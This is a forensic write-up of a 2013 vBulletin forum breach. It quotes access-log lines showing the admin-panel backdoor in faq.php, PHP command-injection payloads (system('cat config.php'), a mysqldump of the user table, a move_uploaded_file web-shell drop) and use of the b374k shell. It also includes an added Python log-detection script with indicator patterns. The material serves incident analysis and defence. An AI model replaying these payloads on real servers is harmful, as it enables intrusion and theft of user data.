Villavu Breach July 06

Warning

This is still work in progress!

Here I will document a quick analysis of the villavu security breach that occurred on July the 6th, 2013. I am by no means a forensic expert, but I believe that everybody should know the details.

I can't say I enjoyed the analysis too much, but it was fascinating to see the "evil" side. I'm personally only concerned with the constructive side; this does include security, but not abuse of the aforementioned. This particular breach is not very impressive in the sense that it uses standard vBulletin methods (AdminCP; edit files). Furthermore, the main access was gained through social engineering. From a technical point of view, this is not impressive, but there is something to be said for pulling off a successful social engineering attempt.

You will find the details in the next few parts. They are chronological, but not necessarily in the order I gathered the information. The information I have had access to is the access.log and error.log from lighttpd, and the file structure as I found it when I heard the server was compromised. I did not have access to all the POST data, unfortunately.

Part 0: Actions taken when we found out

I will briefly cover the course of action we took as soon as we found out. Here is what happened, chronologically:

  • Got a text message from BenLand100 about the server being compromised.
  • Logged into the server and disabled php and all other executable functions of lighttpd within two minutes. This seems to have stopped any further attacks. This happened around 23:16.
  • Started damage control; checking how bad the situation was.
  • Found out the user information was stolen; we took action to mail everyone affected.

Part 1: Social Engineering

The first part is publicly known, but I will write it down for the sake of history. The attacker managed to get hold of the email accounts of one of our administrators (referred to as A); he tried to get an administrator (other than me; referred to as B) to reset the password of the administrator under attack. Admin B called A to verify this request; Admin A told him he did not request such a thing. Thus, Admin B mailed all other admins about this attempt at phishing. The annoying part: Wizzup (I) did not receive a mail.

Later the same attacker tried to get the password of Admin A reset. I had no contact details for Admin A other than his email addresses, so I asked him to send me an email from his old email address. Being in control of Admin A's email, the attacker got me to reset his password and, later during the day, his Moderator and Administrator control panel access.

Looking back at these events, I should have been more paranoid with handing out this access, of course.

Part 2: Executing code from the AdminCP

Once he had access to the AdminCP, the attacker changed the faq.php file, which can apparently be modified from the AdminCP. Once he had done this, he could execute any command by passing "?faq=welcome&c=COMMAND".

91.236.116.109 villavu.com BraK [05/Jul/2013:19:49:18 +0200] "GET /forum/admincp/faq.php?do=add HTTP/1.1" 200 3686 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:49:18 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:50:18 +0200] "POST /forum/ajax.php HTTP/1.1" 200 133 "http://villavu.com/forum/forum.php?cwd=phpinfo();" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:19:51:50 +0200] "POST /forum/admincp/faq.php?do=insert HTTP/1.1" 200 2062 "http://villavu.com/forum/admincp/faq.php?do=add" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:51:50 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:19:51:51 +0200] "GET /forum/admincp/faq.php?faq=%20welcome HTTP/1.1" 200 2563 "http://villavu.com/forum/admincp/faq.php?do=insert" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:52:02 +0200] "GET /forum/faq.php?faq=welcome&c=phpinfo(); HTTP/1.1" 200 108317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Part 3: Getting the user part of the database

Once this was done, getting the database was trivial: open the config.php file and look for the database password, then use mysqldump to save part of the database to a file, and retrieve that file with cat. Finally, he removed the database dump from "/tmp".

91.236.116.109 villavu.com - [05/Jul/2013:19:52:09 +0200] "GET /forum/faq.php?faq=welcome&c=var_dump(is_writable('.')); HTTP/1.1" 200 47824 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:52:19 +0200] "GET /forum/faq.php?faq=welcome&c=system('id'); HTTP/1.1" 200 47857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:52:33 +0200] "GET /forum/faq.php?faq=welcome&c=system('cat%20includes/config.php'); HTTP/1.1" 200 57299 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:53:07 +0200] "GET /forum/faq.php?faq=welcome&c=system('mysqldump%20-u%20vBulletin%20-pXXXXXXXXXXX%20vB_SRL%20user%20%3E%20/tmp/dump.sql'); HTTP/1.1" 200 17979 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:53:12 +0200] "GET /forum/faq.php?faq=welcome&c=system('ls%20-lah%20/tmp/dump.sql'); HTTP/1.1" 200 47893 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:55:02 +0200] "GET /forum/faq.php?faq=welcome&c=system('cat%20/tmp/dump.sql'); HTTP/1.1" 200 50265471 "-" "Wget/1.13.4 (linux-gnu)"
91.236.116.109 villavu.com - [05/Jul/2013:19:55:38 +0200] "GET /forum/faq.php?faq=welcome&c=system('rm%20/tmp/dump.sql'); HTTP/1.1" 200 17900 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

Worth noting is the mysqldump command: it only dumps the user table. The size of the file can also be seen in the "cat" request: 50265471 bytes. This is significantly smaller than our "full" database, which is 3.3GB as of this moment.

Part 4: Various attempts to place backdoors

After successfully downloading the user part of the database, the attacker tried to get more access to the system. He seems to have been successful to some extent.

First, he tried to find a writable directory and then to place a .php file there; the first attempts are repeated several times. Eventually, he succeeded in placing a php file called "pseudo.php", followed by python and perl versions of the same program, called "b374k" version 2.2. These are programs typically used by script kiddies to make their destructive tasks easier.

91.236.116.109 villavu.com - [05/Jul/2013:19:55:46 +0200] "GET /forum/faq.php?faq=welcome&c=system('find%20.%20-writable'); HTTP/1.1" 200 53364 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:19:57:41 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
91.236.116.109 villavu.com - [05/Jul/2013:19:58:14 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
91.236.116.109 villavu.com - [05/Jul/2013:19:59:44 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:07 +0200] "GET /forum/admincp/attachment.php?do=storage HTTP/1.1" 200 2099 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:00:07 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:00:11 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:11 +0200] "GET /forum/modcp/moderate.php?do=attachments HTTP/1.1" 200 1896 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:00:11 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:12 +0200] "GET /forum/admincp/attachment.php?do=stats HTTP/1.1" 200 3385 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:00:12 +0200] "GET /forum/admincp/attachmentpermission.php HTTP/1.1" 200 9947 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:04 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 48701 "-" "curl/7.26.0"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:12 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 4666 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
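Detection logic for the access.log patterns shown in Parts 2 to 4 (PHP calls smuggled into a query parameter, a move_uploaded_file() drop into a writable directory, hits on the dropped shell, scripted clients and the oversized cat response), written as an added example that is not part of the original write-up. The log lines inside it are constructed to mirror the format above with a documentation IP; the indicator lists and the 10 MiB "oversized response" threshold are assumptions.

```python
"""Flag web-shell activity in lighttpd access logs (added example).

Covers the patterns from this write-up: PHP code in a query parameter
(c=system(...)), a move_uploaded_file() drop, requests to the dropped
shell, scripted clients and an oversized response body. The sample
lines are constructed to mirror the page's format; they are not the real log.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# lighttpd accesslog with vhost and user fields, as in the page's excerpts:
# ip vhost user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
    r'(?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# PHP calls that have no business in the query string of a forum page.
PHP_CALL_RE = re.compile(
    r'\b(?:system|exec|shell_exec|passthru|popen|phpinfo|eval|move_uploaded_file)\s*\(',
    re.IGNORECASE,
)
SHELL_NAMES = ('pseudo.php', 'b374k')        # indicator names from the write-up
SCRIPTED_UA = ('curl/', 'wget/', 'python-')  # non-browser clients seen driving the shell
OVERSIZED_BYTES = 10 * 1024 * 1024           # assumed: no forum page is this large


def parse_line(line):
    """Return a dict of fields, or None if the line is not in the expected format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec['target'])
    rec['path'] = url.path
    # parse_qs percent-decodes values, so c=system('cat%20x') becomes readable
    rec['query'] = parse_qs(url.query, keep_blank_values=True)
    rec['decoded'] = unquote(rec['target'])
    rec['bytes'] = 0 if rec['bytes'] == '-' else int(rec['bytes'])
    return rec


def classify(rec):
    """List the indicators matching one parsed request (empty = nothing suspicious)."""
    hits = []
    for key, values in rec['query'].items():
        if any(PHP_CALL_RE.search(v) for v in values):
            hits.append(f'php-call-in-query:{key}')
    if any(name in rec['decoded'].lower() for name in SHELL_NAMES):
        hits.append('known-webshell-name')
    path = rec['path'].lower()
    if path.endswith('.php') and '/logs/' in path:
        hits.append('php-under-writable-dir')
    if path.endswith('.php') and rec['ua'].lower().startswith(SCRIPTED_UA):
        hits.append('scripted-client')
    if rec['bytes'] > OVERSIZED_BYTES:
        hits.append('oversized-response')
    return hits


def scan(lines):
    """Parse every line and keep only the requests that triggered an indicator."""
    results = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            results.append({'ip': rec['ip'], 'time': rec['time'], 'method': rec['method'],
                            'path': rec['path'], 'bytes': rec['bytes'], 'hits': hits})
    return results


def by_ip(results):
    """Count flagged requests per source address."""
    counts = {}
    for r in results:
        counts[r['ip']] = counts.get(r['ip'], 0) + 1
    return counts


# Constructed sample modelled on the page's excerpts (198.51.100.7 is a documentation IP).
SAMPLE_LOG = """\
198.51.100.7 forum.example - [05/Jul/2013:19:52:02 +0200] "GET /forum/faq.php?faq=welcome&c=phpinfo(); HTTP/1.1" 200 108317 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 forum.example - [05/Jul/2013:19:53:07 +0200] "GET /forum/faq.php?faq=welcome&c=system('mysqldump%20-u%20dbuser%20-pREDACTED%20db%20user%20%3E%20/tmp/dump.sql'); HTTP/1.1" 200 17979 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 forum.example - [05/Jul/2013:19:55:02 +0200] "GET /forum/faq.php?faq=welcome&c=system('cat%20/tmp/dump.sql'); HTTP/1.1" 200 50265471 "-" "Wget/1.13.4 (linux-gnu)"
198.51.100.7 forum.example - [05/Jul/2013:19:57:41 +0200] "POST /forum/faq.php?faq=welcome&c=move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%27vbsso%2Flogs%2Fpseudo.php%27%29%3B HTTP/1.1" 200 58 "-" "curl/7.26.0"
198.51.100.7 forum.example - [05/Jul/2013:20:10:12 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 4666 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 forum.example - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/htdocs/forum/vbsso/logs/&delete=/var/www/htdocs/forum/vbsso/logs/b374k_back.pl HTTP/1.1" 200 250962 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 forum.example - [05/Jul/2013:20:00:00 +0200] "GET /forum/faq.php?faq=welcome HTTP/1.1" 200 2563 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

if __name__ == '__main__':
    flagged = scan(SAMPLE_LOG.splitlines())
    for r in flagged:
        print(r['time'], r['ip'], r['method'], r['path'], ', '.join(r['hits']))
    print('flagged per ip:', by_ip(flagged))
```

Run it against the real access.log with `scan(open(path))` and review the flagged lines by IP; the benign last sample line shows that an ordinary faq.php request produces no hit.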

pseudo.php is then used for various tasks:

91.236.116.109 villavu.com - [05/Jul/2013:20:10:12 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:15 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 302 0 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:15 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:15 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:16 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 246507 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:16 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/ HTTP/1.1" 200 195414 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:25 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:29 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/ HTTP/1.1" 200 25792 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:10:51 +0200] "GET /forum/admincp/faq.php?null=0 HTTP/1.1" 200 2576 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:51 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:10:57 +0200] "GET /forum/admincp/faq.php?do=delete&faq=test HTTP/1.1" 200 2342 "http://villavu.com/forum/admincp/faq.php?null=0" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:58 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:10:59 +0200] "POST /forum/admincp/faq.php?do=kill HTTP/1.1" 200 2062 "http://villavu.com/forum/admincp/faq.php?do=delete&faq=test" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:10:59 +0200] "GET /favicon.ico HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com BraK [05/Jul/2013:20:11:01 +0200] "GET /forum/admincp/faq.php?faq=welcome HTTP/1.1" 200 2524 "http://villavu.com/forum/admincp/faq.php?do=kill" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

This is followed by more actions on pseudo.php; I cannot find particularly interesting commands here other than exploring the http docroot.

91.236.116.109 villavu.com - [05/Jul/2013:20:11:18 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/ HTTP/1.1" 200 467542 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:18 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:31 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php HTTP/1.1" 200 39120 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:31 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:31 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:32 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:38 +0200] "GET /forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/includes/ HTTP/1.1" 200 14093 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/includes/&view=/var/www/localhost/htdocs/forum/includes/config.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:11:38 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?rs&d=/var/www/localhost/htdocs/forum/includes/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

He then proceeds to upload several more files to "vbsso/logs" (which is a writable directory):

91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl HTTP/1.1" 200 250962 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:17 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:18 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:19 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:19 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_bind.py HTTP/1.1" 200 249276 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/b374k_back.pl" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:19 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:20:45:20 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/var/www/localhost/htdocs/forum/vbsso/logs/&delete=/var/www/localhost/htdocs/forum/vbsso/logs/bind.c" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
